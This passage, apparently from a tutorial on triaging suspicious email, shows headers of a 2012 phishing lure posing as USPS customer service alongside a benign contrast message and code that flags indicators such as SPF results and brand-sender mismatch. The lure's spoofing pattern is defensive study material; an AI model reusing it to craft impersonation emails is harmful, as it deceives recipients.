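 by mx1.example (Postfix) with ESMTP id 58343471681;
 Thu, 30 Aug 2012 16:52:09 +0000 (GMT)
Received: (from www@localhost)
 by suzan.yourwebhost.example (8.14.3/8.12.10) id q7UGq3Uc015428;
 Thu, 30 Aug 2012 12:52:03 -0400
Authentication-Results: mx.example; spf=neutral (best guess record for domain of www@suzan.yourwebhost.example) smtp.mail=www@suzan.yourwebhost.example
From: "USPS Customer Service"
Reply-To: "USPS Customer Service"
Subject: Delivery refuse ID#36556
X-Mailer: CF-XPInformer
X-CTCH-Spam: Suspect
Content-Type: multipart/mixed; boundary="----------1346345523503F9A33361C5"

(body omitted)
"""
# Constructed benign message for contrast (hypothetical sender).
BENIGN_HEADERS = """Received: from mail.example.org (mail.example.org [192.0.2.10])
 by mx.example (Postfix) with ESMTPS id 0123456789;
 Thu, 30 Aug 2012 16:00:00 +0000 (GMT)
Authentication-Results: mx.example; spf=pass smtp.mail=alice@example.org
From: Alice <alice@example.org>
Subject: Lunch on Friday?

(body omitted)
"""

if __name__ == "__main__":
    print("lure:  ", triage_headers(LURE_HEADERS))
    print("benign:", triage_headers(BENIGN_HEADERS))
```

None of these checks is decisive on its own (plenty of legitimate mail fails SPF, and web scripts send real notifications), which is why the function returns the full list rather than a verdict; a gateway would weight them, and the brand/sender mismatch plus the delivery-lure subject together are the pairing that matches this campaign.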